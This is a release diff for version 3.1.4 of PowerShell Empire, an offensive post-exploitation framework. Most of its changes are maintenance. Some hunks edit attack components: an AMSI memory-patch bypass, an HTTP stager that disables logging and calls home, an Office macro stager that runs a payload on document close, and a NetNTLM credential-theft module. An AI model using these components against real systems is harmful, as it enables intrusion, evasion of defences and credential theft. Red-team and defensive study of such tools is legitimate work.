Codebase list powershell-empire / upstream/3.1.4
New upstream version 3.1.4 Sophie Brun 4 years ago
21 changed file(s) with 70 addition(s) and 68 deletion(s). Raw diff Collapse all Expand all
+1
-1
README.md less more
4343
4444 Please see our [Releases](https://github.com/BC-SECURITY/Empire/releases) or [Changelog](/changelog) page for detailed release notes.
4545 ## Install
46 As of Empire 3.1.0, Empire only officially supports Python 3. If you still need Python 2 support, please use the [3.0.x branch](https://github.com/BC-SECURITY/Empire/tree/3.0.x) or releases. Also consider using our [Prebuilt Docker containers](#Docker) which use Python 3.
46 As of Empire 3.1.0, Empire only officially supports Python 3. If you still need Python 2 support, please use the [3.0.x branch](https://github.com/BC-SECURITY/Empire/tree/v3.0.7) or releases. Also consider using our [Prebuilt Docker containers](#Docker) which use Python 3.
4747
4848 __Note:__ Run ```./setup/reset.sh``` before starting Empire 3.1 for the first time.
4949 ### Kali
+1
-1
VERSION less more
0 3.1.3
0 3.1.4
+11
-1
changelog less more
0 4/4/2020
1 ------------
2 - Version 3.1.4 Master Release
3 - Fixed non-ascii filename download error - #141 (@tyraniter)
4 - Updated payload evasion against Defender - #147 (@Hubbl3)
5 - Added reset flag to empire launcher - #147 (@Cx01N)
6 - Replaced imp package with importlib - #108 (@Cx01N)
7 - Fixed internal monologue issue with only running once - #43 (@Cx01N)
8 - Fixed ascii encode error in powerbreach modules - #150 (@CykuTW)
9
010 3/22/2020
111 ------------
212 - Version 3.1.3 Master Release
313 - Fixed errors with OneDrive listener - #40 (@Cx01N)
414 - Fixed REST API get config error - #131 (@chenxiangfang)
5 - Increased timer for stale agent checkins - #130 (@C01N)
15 - Increased timer for stale agent checkins - #130 (@Cx01N)
616
717 3/13/2020
818 ------------
+3
-2
data/agent/agent.py less more
1010 import http.server
1111 import zipfile
1212 import io
13 import imp
13 import importlib.util
14 import types
1415 import re
1516 import shutil
1617 import pwd
593594 def load_module(self, fullname):
594595 submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
595596 code = compile(source, fullpath, 'exec')
596 mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
597 mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
597598 mod.__loader__ = self
598599 mod.__file__ = fullpath
599600 mod.__name__ = fullname
+8
-5
data/module_source/credentials/Invoke-InternalMonologue.ps1 less more
488488 }
489489 }
490490
491
491 if (authenticatedUsers.Count > 0)
492 {
493 authenticatedUsers.Clear();
494 }
492495 //Extended NetNTLM Downgrade and impersonation can only work if the current process is elevated
493496 if (IsElevated())
494497 {
536539 //If the process is not elevated, skip downgrade and impersonation and only perform an Internal Monologue Attack for the current user
537540 if (verbose == true) Console.WriteLine("Not elevated. Performing attack with current NTLM settings on current user");
538541 Console.WriteLine(InternalMonologueForCurrentUser(challenge));
539 }
542 }
540543 }
541544
542545 //This function performs an Internal Monologue Attack in the context of the current user and returns the NetNTLM response for the challenge 0x1122334455667788
639642 {
640643 result = ConvertHex(ByteArrayToString(user)) + "::" + ConvertHex(ByteArrayToString(domain)) + ":" + challenge + ":" + ByteArrayToString(nt_resp).Substring(0,32) + ":" + ByteArrayToString(nt_resp).Substring(32);
641644 }
642
645
643646 return result;
644647 }
645648
699702
700703 }
701704
702 return ascii;
705 return ascii;
703706 }
704707 }
705708
887890 [Console]::SetOut($OldConsoleOut)
888891 $Results = $StringWriter.ToString()
889892 $Results
890 }
893 }
+4
-0
empire less more
14451445
14461446 generalGroup = parser.add_argument_group('General Options')
14471447 generalGroup.add_argument('--debug', nargs='?', const='1', help='Debug level for output (default of 1, 2 for msg display).')
1448 generalGroup.add_argument('--reset-empire', action='store_true', help="Resets Empire's database to defaults.")
14481449 generalGroup.add_argument('-v', '--version', action='store_true', help='Display current Empire version.')
14491450 generalGroup.add_argument('-r','--resource', nargs=1, help='Run the Empire commands in the specified resource file after startup.')
14501451
14721473 if args.version:
14731474 print(empire.VERSION)
14741475
1476 if args.reset_empire:
1477 subprocess.call("./setup/reset.sh")
1478
14751479 elif args.rest:
14761480 # start an Empire instance and RESTful API
14771481 main = empire.MainMenu(args=args)
+1
-1
lib/common/bypasses.py less more
6363 [Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
6464 $buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3);
6565
66 [system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6)
66 [system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
6767 """
6868 bypass = bypass.replace('"kernel32"', '`"kernel32`"')
6969 bypass = bypass.replace('@"','"')
+1
-2
lib/common/empire.py less more
1414 from builtins import str
1515 from builtins import range
1616
17 VERSION = "3.1.3 BC-Security Fork"
17 VERSION = "3.1.4 BC-Security Fork"
1818
1919 from pydispatch import dispatcher
2020
537537
538538 def do_uselistener(self, line):
539539 "Use an Empire listener module."
540 print("uselistener")
541540 parts = line.split(' ')
542541
543542 if parts[0] not in self.listeners.loadedListeners:
+5
-3
lib/common/listeners.py less more
1010 from builtins import object
1111 import sys
1212 import fnmatch
13 import imp
13 import importlib.util
1414 from . import helpers
1515 import os
1616 import pickle
6464 listenerName = filePath.split("/lib/listeners/")[-1][0:-3]
6565
6666 # instantiate the listener module and save it to the internal cache
67 self.loadedListeners[listenerName] = imp.load_source(listenerName, filePath).Listener(self.mainMenu, [])
68
67 spec = importlib.util.spec_from_file_location(listenerName, filePath)
68 mod = importlib.util.module_from_spec(spec)
69 spec.loader.exec_module(mod)
70 self.loadedListeners[listenerName] = mod.Listener(self.mainMenu, [])
6971
7072 def set_listener_option(self, listenerName, option, value):
7173 """
+9
-5
lib/common/modules.py less more
1111 from builtins import object
1212 import fnmatch
1313 import os
14 import imp
14 import importlib.util
1515 from . import messages
1616 from . import helpers
1717
5959 moduleName = "external/%s" %(moduleName)
6060
6161 # instantiate the module and save it to the internal cache
62 self.modules[moduleName] = imp.load_source(moduleName, filePath).Module(self.mainMenu, [])
63
62 spec = importlib.util.spec_from_file_location(moduleName, filePath)
63 mod = importlib.util.module_from_spec(spec)
64 spec.loader.exec_module(mod)
65 self.modules[moduleName] = mod.Module(self.mainMenu, [])
6466
6567 def reload_module(self, moduleToReload):
6668 """
8385 # check to make sure we've found the specific module
8486 if moduleName.lower() == moduleToReload.lower():
8587 # instantiate the module and save it to the internal cache
86 self.modules[moduleName] = imp.load_source(moduleName, filePath).Module(self.mainMenu, [])
87
88 spec = importlib.util.spec_from_file_location(moduleName, filePath)
89 mod = importlib.util.module_from_spec(spec)
90 spec.loader.exec_module(mod)
91 self.modules[moduleName] = mod.Module(self.mainMenu, [])
8892
8993 def search_modules(self, searchTerm):
9094 """
+1
-1
lib/common/packets.py less more
164164 totalPacket = struct.pack('=H', 1)
165165 packetNum = struct.pack('=H', 1)
166166 resultID = struct.pack('=H', resultID)
167 length = struct.pack('=L', len(data))
167 length = struct.pack('=L', len(data.encode("UTF-8")))
168168 return taskType + totalPacket + packetNum + resultID + length + data.encode("UTF-8")
169169
170170 def parse_result_packet(packet, offset=0):
+5
-2
lib/common/stagers.py less more
2222 from builtins import object
2323 from past.utils import old_div
2424 import fnmatch
25 import imp
25 import importlib.util
2626 from . import helpers
2727 import errno
2828 import os
7272 stagerName = filePath.split("/lib/stagers/")[-1][0:-3]
7373
7474 # instantiate the module and save it to the internal cache
75 self.stagers[stagerName] = imp.load_source(stagerName, filePath).Stager(self.mainMenu, [])
75 spec = importlib.util.spec_from_file_location(stagerName, filePath)
76 mod = importlib.util.module_from_spec(spec)
77 spec.loader.exec_module(mod)
78 self.stagers[stagerName] = mod.Stager(self.mainMenu, [])
7679
7780
7881 def set_stager_option(self, option, value):
+12
-11
lib/listeners/http.py less more
318318 if safeChecks.lower() == 'true':
319319 stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
320320 # ScriptBlock Logging bypass
321 if scriptLogBypass:
322 stager += bypasses.scriptBlockLogBypass()
323 # @mattifestation's AMSI bypass
324 if AMSIBypass:
325 stager += bypasses.AMSIBypass()
326 # rastamouse AMSI bypass
327 if AMSIBypass2:
328 stager += bypasses.AMSIBypass2()
321 if scriptLogBypass:
322 stager += bypasses.scriptBlockLogBypass()
323 # @mattifestation's AMSI bypass
324 if AMSIBypass:
325 stager += bypasses.AMSIBypass()
326 # rastamouse AMSI bypass
327 if AMSIBypass2:
328 stager += bypasses.AMSIBypass2()
329 if safeChecks.lower() == 'true':
329330 stager += "};"
330331 stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
331
332
332333 stager += helpers.randomize_capitalization(
333334 "$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
334335 if userAgent.lower() == 'default':
338339 if 'https' in host:
339340 # allow for self-signed certificates for https connections
340341 stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
341
342 stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
342343 if userAgent.lower() != 'none':
343344 stager += helpers.randomize_capitalization(
344345 "$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
397398 routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
398399 meta='STAGE0', additional='None', encData='')
399400 b64RoutingPacket = base64.b64encode(routingPacket)
400 stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
401
401402 # Add custom headers if any
402403 if customHeaders != []:
403404 for header in customHeaders:
+1
-2
lib/modules/powershell/persistence/powerbreach/deaduser.py less more
162162 return ""
163163 else:
164164 script = script.replace("REPLACE_LAUNCHER", stagerCode)
165 script = script.encode('ascii', 'ignore')
166
165
167166 for option,values in self.options.items():
168167 if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
169168 if values['Value'] and values['Value'] != '':
+1
-2
lib/modules/powershell/persistence/powerbreach/eventlog.py less more
137137 return ""
138138 else:
139139 script = script.replace("REPLACE_LAUNCHER", stagerCode)
140 script = script.encode('ascii', 'ignore')
141
140
142141 for option,values in self.options.items():
143142 if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
144143 if values['Value'] and values['Value'] != '':
+0
-1
lib/modules/powershell/persistence/powerbreach/resolver.py less more
149149 return ""
150150 else:
151151 script = script.replace("REPLACE_LAUNCHER", stagerCode)
152 script = script.encode('ascii', 'ignore')
153152
154153 for option,values in self.options.items():
155154 if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
+0
-2
lib/modules/python/collection/osx/keychaindump_chainbreaker.py less more
19891989 return data
19901990
19911991 cipher = triple_des(key, CBC, iv)
1992 # the line below is for pycrypto instead
1993 #cipher = DES3.new( key, DES3.MODE_CBC, iv )
19941992
19951993 plain = cipher.decrypt(data)
19961994
+4
-17
lib/stagers/windows/macro.py less more
169169 for chunk in chunks[1:]:
170170 payload += "\t"+Str+" = "+Str+" + \"" + str(chunk) + "\"\n"
171171
172 macro = "Sub Auto_Open()\n"
173 macro += "\t"+Method+"\n"
174 macro += "End Sub\n\n"
175 macro += "Sub AutoOpen()\n"
176 macro += "\t"+Method+"\n"
177 macro += "End Sub\n\n"
178
179 macro += "Sub Document_Open()\n"
172 macro = "Sub AutoClose()\n"
180173 macro += "\t"+Method+"\n"
181174 macro += "End Sub\n\n"
182175
183176 macro += "Public Function "+Method+"() As Variant\n"
184 macro += "\tstrComputer = \".\"\n"
185 macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
177
186178 if OutlookEvasionBool == True:
187179 macro += "\tSet ID = objWMIService.ExecQuery(\"Select IdentifyingNumber from Win32_ComputerSystemproduct\")\n"
188180 macro += "\tFor Each objItem In ID\n"
195187 macro +="\tNext\n"
196188
197189 macro += payload
198 macro += "\tConst HIDDEN_WINDOW = 0\n"
199
200 macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
201 macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
202 macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
203 macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
204 macro += "\tobjProcess.Create "+Str+", Null, objConfig, intProcessID\n"
190 macro += "\tSet asd = CreateObject(\"WScript.Shell\")\n"
191 macro += "\tasd.Run("+Str+")\n"
205192 macro += "End Function\n"
206193
207194 return macro
+1
-1
setup/requirements.txt less more
1414 cryptography
1515 pyminifier
1616 xlutils
17 pycrypto
1817 pefile
1918 simplejson
2019 bcrypt
20 pycrypto
+1
-1
setup/requirements_libssl1.0.txt less more
1414 cryptography
1515 pyminifier==2.1
1616 xlutils
17 pefile
1718 pycrypto
18 pefile
+0
-7
setup/reset.sh less more
3131 then
3232 rm -rf ./downloads/
3333 fi
34
35 # start up Empire if not in docker otherwise return
36 if [ -f /.dockerenv ]; then
37 echo " [*] Empire reset complete returning back to Docker"
38 else
39 ./empire
40 fi